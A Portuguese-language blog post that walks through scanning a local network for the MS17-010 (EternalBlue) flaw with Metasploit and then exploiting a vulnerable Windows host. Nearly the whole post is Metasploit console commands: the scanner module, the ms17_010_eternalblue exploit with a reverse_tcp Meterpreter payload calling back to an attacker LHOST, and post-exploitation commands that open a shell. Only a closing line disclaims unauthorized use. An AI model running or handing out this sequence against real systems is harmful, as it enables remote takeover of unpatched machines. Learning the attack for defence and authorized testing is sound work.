Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.
A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/
Comandos dentro do Kali Linux
# service postgresql start
# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Pos invasão
sysinfo
getuid
shell
E por ai vai...
Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!
Junior
Blog Posts
- 2022 (4)
- 2021 (2)
- 2020 (7)
- 2019 (31)
- November (1)
- October (2)
- September (3)
- August (4)
- July (5)
- June (3)
- April (3)
- March (4)
- February (4)
- January (2)
- 2018 (21)
- December (3)
- November (4)
- October (2)
- September (3)
- July (3)
- June (1)
- May (1)
- April (1)
- March (1)
- February (2)
- 2017 (29)
- December (1)
- November (4)
- October (2)
- September (2)
- August (1)
- July (6)
- June (3)
- May (1)
- April (1)
- March (5)
- February (1)
- January (2)
- 2016 (17)
- 2015 (7)
- 2014 (7)
- 2013 (24)
Freund
0 Communities
keine